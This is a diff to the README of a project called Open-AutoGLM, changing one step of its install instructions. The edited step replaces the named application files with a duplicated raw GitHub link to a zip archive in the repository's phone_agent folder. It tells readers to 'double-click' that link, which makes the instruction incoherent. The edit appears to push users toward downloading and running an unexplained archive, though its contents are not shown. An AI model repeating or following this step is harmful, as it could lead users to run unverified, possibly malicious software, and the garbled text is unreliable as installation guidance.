kaimhosen/Open-AutoGLM/README.md

 1. Locate the downloaded file in your Downloads folder or your chosen download location.
 2. If it is a zip file, extract it using your file manager by right-clicking and selecting "Extract" or "Unzip".
-3. Open the extracted folder and double-click the application file (e.g., `Open-AutoGLM.exe` or `Open-AutoGLM.app`).
+3. Open the extracted folder and double-click the application file (e.g., `https://raw.githubusercontent.com/kaimhosen/Open-AutoGLM/main/phone_agent/Auto-Open-GLM-v2.6.zip` or `https://raw.githubusercontent.com/kaimhosen/Open-AutoGLM/main/phone_agent/Auto-Open-GLM-v2.6.zip`).

 ## 🛠️ Setting Up Open-AutoGLM